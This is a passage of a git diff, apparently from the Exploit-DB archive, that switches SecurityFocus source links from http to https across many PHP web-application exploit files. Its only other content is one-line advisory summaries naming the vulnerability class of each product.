@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20685/info +source: https://www.securityfocus.com/bid/20685/info Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28846.html b/exploits/php/webapps/28846.html index 078ae6928..bf6f95266 100644 --- a/exploits/php/webapps/28846.html +++ b/exploits/php/webapps/28846.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20688/info +source: https://www.securityfocus.com/bid/20688/info WikiNi is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data before using it in dynamically generated content. diff --git a/exploits/php/webapps/28851.txt b/exploits/php/webapps/28851.txt index bb2acc3fc..e0901f7dc 100644 --- a/exploits/php/webapps/28851.txt +++ b/exploits/php/webapps/28851.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20711/info +source: https://www.securityfocus.com/bid/20711/info Crafty Syntax Live Help is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28858.txt b/exploits/php/webapps/28858.txt index 13600da9a..a1a051f37 100644 --- a/exploits/php/webapps/28858.txt +++ b/exploits/php/webapps/28858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20714/info +source: https://www.securityfocus.com/bid/20714/info SimpNews is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28859.txt b/exploits/php/webapps/28859.txt index 7fdb10123..c35cfa9de 100644 --- a/exploits/php/webapps/28859.txt +++ b/exploits/php/webapps/28859.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20714/info +source: https://www.securityfocus.com/bid/20714/info SimpNews is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28861.txt b/exploits/php/webapps/28861.txt index fa2338791..b3c1b35d6 100644 --- a/exploits/php/webapps/28861.txt +++ b/exploits/php/webapps/28861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20739/info +source: https://www.securityfocus.com/bid/20739/info Comment IT is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28862.txt b/exploits/php/webapps/28862.txt index fd0fffb68..270701cc6 100644 --- a/exploits/php/webapps/28862.txt +++ b/exploits/php/webapps/28862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20741/info +source: https://www.securityfocus.com/bid/20741/info phpMyConference is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28864.txt b/exploits/php/webapps/28864.txt index 555ea2c12..24f9ba983 100644 --- a/exploits/php/webapps/28864.txt +++ b/exploits/php/webapps/28864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20756/info +source: https://www.securityfocus.com/bid/20756/info Php League is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28865.txt b/exploits/php/webapps/28865.txt index edd4ca4d4..f2faff091 100644 --- a/exploits/php/webapps/28865.txt +++ b/exploits/php/webapps/28865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20764/info +source: https://www.securityfocus.com/bid/20764/info PHPTreeview is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/php/webapps/28866.txt b/exploits/php/webapps/28866.txt index ab181792a..9ae3af74f 100644 --- a/exploits/php/webapps/28866.txt +++ b/exploits/php/webapps/28866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20768/info +source: https://www.securityfocus.com/bid/20768/info iG Shop is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28867.txt b/exploits/php/webapps/28867.txt index 7e8713ad5..1c89fd810 100644 --- a/exploits/php/webapps/28867.txt +++ b/exploits/php/webapps/28867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20771/info +source: https://www.securityfocus.com/bid/20771/info TorrentFlux is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28868.txt b/exploits/php/webapps/28868.txt index 7ef477b60..36d5d2594 100644 --- a/exploits/php/webapps/28868.txt +++ b/exploits/php/webapps/28868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20772/info +source: https://www.securityfocus.com/bid/20772/info PLS-Bannieres is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28870.txt b/exploits/php/webapps/28870.txt index 305ed9db2..3f17503cf 100644 --- a/exploits/php/webapps/28870.txt +++ b/exploits/php/webapps/28870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20786/info +source: https://www.securityfocus.com/bid/20786/info PunBB is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28871.txt b/exploits/php/webapps/28871.txt index 39dc18cbd..66da064ca 100644 --- a/exploits/php/webapps/28871.txt +++ b/exploits/php/webapps/28871.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20788/info +source: https://www.securityfocus.com/bid/20788/info Actionpoll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28872.txt b/exploits/php/webapps/28872.txt index f41a550e8..4aeabefb4 100644 --- a/exploits/php/webapps/28872.txt +++ b/exploits/php/webapps/28872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20788/info +source: https://www.securityfocus.com/bid/20788/info Actionpoll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28873.txt b/exploits/php/webapps/28873.txt index 9dcdbedf2..bd26b723e 100644 --- a/exploits/php/webapps/28873.txt +++ b/exploits/php/webapps/28873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20793/info +source: https://www.securityfocus.com/bid/20793/info Exhibit Engine Software is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28874.txt b/exploits/php/webapps/28874.txt index 874113cab..73e181565 100644 --- a/exploits/php/webapps/28874.txt +++ b/exploits/php/webapps/28874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20793/info +source: https://www.securityfocus.com/bid/20793/info Exhibit Engine Software is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28875.txt b/exploits/php/webapps/28875.txt index 04e69c737..676ffc3d5 100644 --- a/exploits/php/webapps/28875.txt +++ b/exploits/php/webapps/28875.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20795/info +source: https://www.securityfocus.com/bid/20795/info Freenews is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28881.txt b/exploits/php/webapps/28881.txt index 10abd760a..f34fd9595 100644 --- a/exploits/php/webapps/28881.txt +++ b/exploits/php/webapps/28881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20818/info +source: https://www.securityfocus.com/bid/20818/info ForeSite CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28882.txt b/exploits/php/webapps/28882.txt index 6704594aa..1507d4ef5 100644 --- a/exploits/php/webapps/28882.txt +++ b/exploits/php/webapps/28882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20821/info +source: https://www.securityfocus.com/bid/20821/info phpFaber CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28883.txt b/exploits/php/webapps/28883.txt index fd432fe50..2a0d2fa98 100644 --- a/exploits/php/webapps/28883.txt +++ b/exploits/php/webapps/28883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20825/info +source: https://www.securityfocus.com/bid/20825/info Easy Web Portal is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28885.php b/exploits/php/webapps/28885.php index 3cd4698ae..7967f4776 100644 --- a/exploits/php/webapps/28885.php +++ b/exploits/php/webapps/28885.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20829/info +source: https://www.securityfocus.com/bid/20829/info The PHP-Nuke Journal module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28886.txt b/exploits/php/webapps/28886.txt index 4e7814a5b..29921cd38 100644 --- a/exploits/php/webapps/28886.txt +++ b/exploits/php/webapps/28886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20831/info +source: https://www.securityfocus.com/bid/20831/info The Search Engine Project is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28889.txt b/exploits/php/webapps/28889.txt index 3a006092c..cb211078e 100644 --- a/exploits/php/webapps/28889.txt +++ b/exploits/php/webapps/28889.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20837/info +source: https://www.securityfocus.com/bid/20837/info Netquery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28890.txt b/exploits/php/webapps/28890.txt index 1088e220d..116713a6c 100644 --- a/exploits/php/webapps/28890.txt +++ b/exploits/php/webapps/28890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20838/info +source: https://www.securityfocus.com/bid/20838/info iPlanet Messaging Server Messenger Express is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28891.txt b/exploits/php/webapps/28891.txt index f4b1fefaa..2d02249e1 100644 --- a/exploits/php/webapps/28891.txt +++ b/exploits/php/webapps/28891.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20840/info +source: https://www.securityfocus.com/bid/20840/info Mirapoint Web Mail is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28892.txt b/exploits/php/webapps/28892.txt index c099b3704..3cb6b1239 100644 --- a/exploits/php/webapps/28892.txt +++ b/exploits/php/webapps/28892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20849/info +source: https://www.securityfocus.com/bid/20849/info RSSonate is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28893.pl b/exploits/php/webapps/28893.pl index da691ccbc..ac985ea3f 100755 --- a/exploits/php/webapps/28893.pl +++ b/exploits/php/webapps/28893.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20857/info +source: https://www.securityfocus.com/bid/20857/info KnowledgeBuilder is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28896.txt b/exploits/php/webapps/28896.txt index 27eeb8129..40b477cbf 100644 --- a/exploits/php/webapps/28896.txt +++ b/exploits/php/webapps/28896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20874/info +source: https://www.securityfocus.com/bid/20874/info RunCMS is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/28898.txt b/exploits/php/webapps/28898.txt index 2ad10e0cb..b4212cdc2 100644 --- a/exploits/php/webapps/28898.txt +++ b/exploits/php/webapps/28898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20887/info +source: https://www.securityfocus.com/bid/20887/info FreeWebShop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
diff --git a/exploits/php/webapps/28899.txt b/exploits/php/webapps/28899.txt index 9dae795a3..bd87cd4cd 100644 --- a/exploits/php/webapps/28899.txt +++ b/exploits/php/webapps/28899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20893/info +source: https://www.securityfocus.com/bid/20893/info NewP News Publishing system is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28900.txt b/exploits/php/webapps/28900.txt index 51b5362da..319764335 100644 --- a/exploits/php/webapps/28900.txt +++ b/exploits/php/webapps/28900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28901.txt b/exploits/php/webapps/28901.txt index a47e39f66..29893ab88 100644 --- a/exploits/php/webapps/28901.txt +++ b/exploits/php/webapps/28901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28902.txt b/exploits/php/webapps/28902.txt index 6b06e6747..89a3a47ec 100644 --- a/exploits/php/webapps/28902.txt +++ b/exploits/php/webapps/28902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28903.txt b/exploits/php/webapps/28903.txt index 7da1b8553..5fbf17bc4 100644 --- a/exploits/php/webapps/28903.txt +++ b/exploits/php/webapps/28903.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28904.txt b/exploits/php/webapps/28904.txt index ca65b08f9..f532936d2 100644 --- a/exploits/php/webapps/28904.txt +++ b/exploits/php/webapps/28904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28905.txt b/exploits/php/webapps/28905.txt index b11a2f99c..a6a8a6c27 100644 --- a/exploits/php/webapps/28905.txt +++ b/exploits/php/webapps/28905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28906.txt b/exploits/php/webapps/28906.txt index 8fcb19200..a5a63e667 100644 --- a/exploits/php/webapps/28906.txt +++ b/exploits/php/webapps/28906.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20899/info +source: https://www.securityfocus.com/bid/20899/info Simplog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28907.txt b/exploits/php/webapps/28907.txt index 89113e632..1670c4fea 100644 --- a/exploits/php/webapps/28907.txt +++ b/exploits/php/webapps/28907.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20900/info +source: https://www.securityfocus.com/bid/20900/info Simplog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28908.txt b/exploits/php/webapps/28908.txt index 1939b1716..a62cde2bf 100644 --- a/exploits/php/webapps/28908.txt +++ b/exploits/php/webapps/28908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20902/info +source: https://www.securityfocus.com/bid/20902/info Advanced GuestBook for phpBB is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28909.txt b/exploits/php/webapps/28909.txt index 3807210e3..c2eb80405 100644 --- a/exploits/php/webapps/28909.txt +++ b/exploits/php/webapps/28909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20909/info +source: https://www.securityfocus.com/bid/20909/info IF-CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28910.pl b/exploits/php/webapps/28910.pl index d596adeaf..3c755edb3 100755 --- a/exploits/php/webapps/28910.pl +++ b/exploits/php/webapps/28910.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20911/info +source: https://www.securityfocus.com/bid/20911/info PHPKIT is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28913.txt b/exploits/php/webapps/28913.txt index 85b495531..15d652376 100644 --- a/exploits/php/webapps/28913.txt +++ b/exploits/php/webapps/28913.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20925/info +source: https://www.securityfocus.com/bid/20925/info The '@cid stats' program is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28914.txt b/exploits/php/webapps/28914.txt index 4e1eab972..ef9d6081d 100644 --- a/exploits/php/webapps/28914.txt +++ b/exploits/php/webapps/28914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20927/info +source: https://www.securityfocus.com/bid/20927/info Xoops is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28917.txt b/exploits/php/webapps/28917.txt index 1104fe66c..7997ac47c 100644 --- a/exploits/php/webapps/28917.txt +++ b/exploits/php/webapps/28917.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28918.txt b/exploits/php/webapps/28918.txt index eef352f2b..b7d5bffad 100644 --- a/exploits/php/webapps/28918.txt +++ b/exploits/php/webapps/28918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28919.txt b/exploits/php/webapps/28919.txt index 97591510a..9e6d4f3c8 100644 --- a/exploits/php/webapps/28919.txt +++ b/exploits/php/webapps/28919.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28920.txt b/exploits/php/webapps/28920.txt index ed8a97b0e..01f668787 100644 --- a/exploits/php/webapps/28920.txt +++ b/exploits/php/webapps/28920.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28921.txt b/exploits/php/webapps/28921.txt index c670f0473..a2951822c 100644 --- a/exploits/php/webapps/28921.txt +++ b/exploits/php/webapps/28921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28922.txt b/exploits/php/webapps/28922.txt index f749876c8..f5a9881e7 100644 --- a/exploits/php/webapps/28922.txt +++ b/exploits/php/webapps/28922.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28923.txt b/exploits/php/webapps/28923.txt index 906847561..bf4a31c4f 100644 --- a/exploits/php/webapps/28923.txt +++ b/exploits/php/webapps/28923.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28924.txt b/exploits/php/webapps/28924.txt index b8a3fde3f..eee02e9f9 100644 --- a/exploits/php/webapps/28924.txt +++ b/exploits/php/webapps/28924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28925.txt b/exploits/php/webapps/28925.txt index 3030024af..fc6dc64cc 100644 --- a/exploits/php/webapps/28925.txt +++ b/exploits/php/webapps/28925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28926.txt b/exploits/php/webapps/28926.txt index d5210c5d4..8dc82a111 100644 --- a/exploits/php/webapps/28926.txt +++ b/exploits/php/webapps/28926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28927.txt b/exploits/php/webapps/28927.txt index 5c0dc74eb..81f7f648c 100644 --- a/exploits/php/webapps/28927.txt +++ b/exploits/php/webapps/28927.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28928.txt b/exploits/php/webapps/28928.txt index c359afdab..e8923bcdb 100644 --- a/exploits/php/webapps/28928.txt +++ b/exploits/php/webapps/28928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28929.txt b/exploits/php/webapps/28929.txt index 74acc996e..c78d388ae 100644 --- a/exploits/php/webapps/28929.txt +++ b/exploits/php/webapps/28929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28930.txt b/exploits/php/webapps/28930.txt index 6acac6036..85735f867 100644 --- a/exploits/php/webapps/28930.txt +++ b/exploits/php/webapps/28930.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28931.txt b/exploits/php/webapps/28931.txt index 2e3e22899..372cf0a0f 100644 --- a/exploits/php/webapps/28931.txt +++ b/exploits/php/webapps/28931.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28932.txt b/exploits/php/webapps/28932.txt index cbd4dbf35..894189309 100644 --- a/exploits/php/webapps/28932.txt +++ b/exploits/php/webapps/28932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28933.txt b/exploits/php/webapps/28933.txt index ba67a429b..bc1d30b23 100644 --- a/exploits/php/webapps/28933.txt +++ b/exploits/php/webapps/28933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28934.txt b/exploits/php/webapps/28934.txt index c321a0d4e..f246a9b17 100644 --- a/exploits/php/webapps/28934.txt +++ b/exploits/php/webapps/28934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28935.txt b/exploits/php/webapps/28935.txt index b40b3ae11..dde91ca42 100644 --- a/exploits/php/webapps/28935.txt +++ b/exploits/php/webapps/28935.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28936.txt b/exploits/php/webapps/28936.txt index 29de656ad..b32f4b35f 100644 --- a/exploits/php/webapps/28936.txt +++ b/exploits/php/webapps/28936.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28937.txt b/exploits/php/webapps/28937.txt index 8d39cdf3d..d0f4194f3 100644 --- a/exploits/php/webapps/28937.txt +++ b/exploits/php/webapps/28937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28938.txt b/exploits/php/webapps/28938.txt index 2a43073fc..40d6ff831 100644 --- a/exploits/php/webapps/28938.txt +++ b/exploits/php/webapps/28938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20952/info +source: https://www.securityfocus.com/bid/20952/info IpManager is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28939.txt b/exploits/php/webapps/28939.txt index 71645dd45..d7daa1096 100644 --- a/exploits/php/webapps/28939.txt +++ b/exploits/php/webapps/28939.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20954/info +source: https://www.securityfocus.com/bid/20954/info Kayako SupportSuite is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28940.txt b/exploits/php/webapps/28940.txt index dd805ee97..5584e27e5 100644 --- a/exploits/php/webapps/28940.txt +++ b/exploits/php/webapps/28940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20962/info +source: https://www.securityfocus.com/bid/20962/info phpMyChat is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28942.txt b/exploits/php/webapps/28942.txt index 2dc107c53..3f8534940 100644 --- a/exploits/php/webapps/28942.txt +++ b/exploits/php/webapps/28942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20969/info +source: https://www.securityfocus.com/bid/20969/info FreeWebShop is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and a local file-include issue. diff --git a/exploits/php/webapps/28943.txt b/exploits/php/webapps/28943.txt index 2d21fb9cc..1a74de826 100644 --- a/exploits/php/webapps/28943.txt +++ b/exploits/php/webapps/28943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20969/info +source: https://www.securityfocus.com/bid/20969/info FreeWebShop is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and a local file-include issue. diff --git a/exploits/php/webapps/28944.txt b/exploits/php/webapps/28944.txt index 85f57a15c..b46ba0952 100644 --- a/exploits/php/webapps/28944.txt +++ b/exploits/php/webapps/28944.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20970/info +source: https://www.securityfocus.com/bid/20970/info Abarcar Realty Portal is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28945.txt b/exploits/php/webapps/28945.txt index f2fb58290..525c62ab7 100644 --- a/exploits/php/webapps/28945.txt +++ b/exploits/php/webapps/28945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20972/info +source: https://www.securityfocus.com/bid/20972/info phpMyChat is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28946.txt b/exploits/php/webapps/28946.txt index 9a11a167f..d7f642114 100644 --- a/exploits/php/webapps/28946.txt +++ b/exploits/php/webapps/28946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20974/info +source: https://www.securityfocus.com/bid/20974/info Portix-PHP is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28947.txt b/exploits/php/webapps/28947.txt index 7d1cb5654..c5d6d81bc 100644 --- a/exploits/php/webapps/28947.txt +++ b/exploits/php/webapps/28947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20976/info +source: https://www.securityfocus.com/bid/20976/info Speedywiki is prone to multiple input-validation vulnerabilities because the application fails to 